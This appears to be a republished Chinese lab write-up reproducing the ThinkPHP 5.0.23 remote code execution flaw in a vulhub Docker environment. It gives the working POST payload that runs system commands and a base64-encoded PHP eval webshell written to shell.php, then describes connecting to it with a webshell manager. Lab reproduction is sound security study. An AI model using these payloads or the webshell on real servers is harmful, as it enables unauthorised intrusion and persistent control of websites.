目錄
漏洞介紹
漏洞復(fù)現(xiàn)
1.環(huán)境搭建
2.漏洞利用
漏洞介紹
5.0.23以前的版本中,獲取method的方法中沒有正確處理方法名,導(dǎo)致攻擊者可以調(diào)用Request類任意方法并構(gòu)造利用鏈,從而導(dǎo)致遠(yuǎn)程代碼執(zhí)行漏洞。
漏洞復(fù)現(xiàn)
1.環(huán)境搭建
使用docker容器搭建漏洞環(huán)境,進(jìn)入漏洞文件所在。
cd vulhub/thinkphp/5.0.23-rce
(每個(gè)人安裝路徑不同,我這里是安裝在vulhub文件內(nèi),選擇自己的安裝路徑)
啟動(dòng)環(huán)境
docker-compose up -d
?等待漏洞環(huán)境啟動(dòng)完成后,訪問your-id:8080就可以看到thinkphp的默認(rèn)頁面了
2.漏洞利用
Poc 路徑:/index.php?s=captcha
訪問your-id:8080/index.php?s=captcha頁面會(huì)出現(xiàn)報(bào)錯(cuò)。
接下來我們進(jìn)行POST傳參,這里使用的工具是hackbar
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
命令被執(zhí)行
?接下來我們就可以上傳shell文件了,但是無法直接上傳shell文件,我們需要對shell文件進(jìn)行Base 64編碼
YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi
發(fā)送POST請求
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi | base64 -d > shell.php
訪問shell.php文件上傳成功
?使用WebShell管理工具連接,輸入上傳的木馬所在位置、密碼以及選擇Base64編碼
查看網(wǎng)站目錄,復(fù)現(xiàn)完成。文章來源:http://www.zghlxwxcb.cn/news/detail-458567.html
文章來源地址http://www.zghlxwxcb.cn/news/detail-458567.html
到了這里,關(guān)于ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!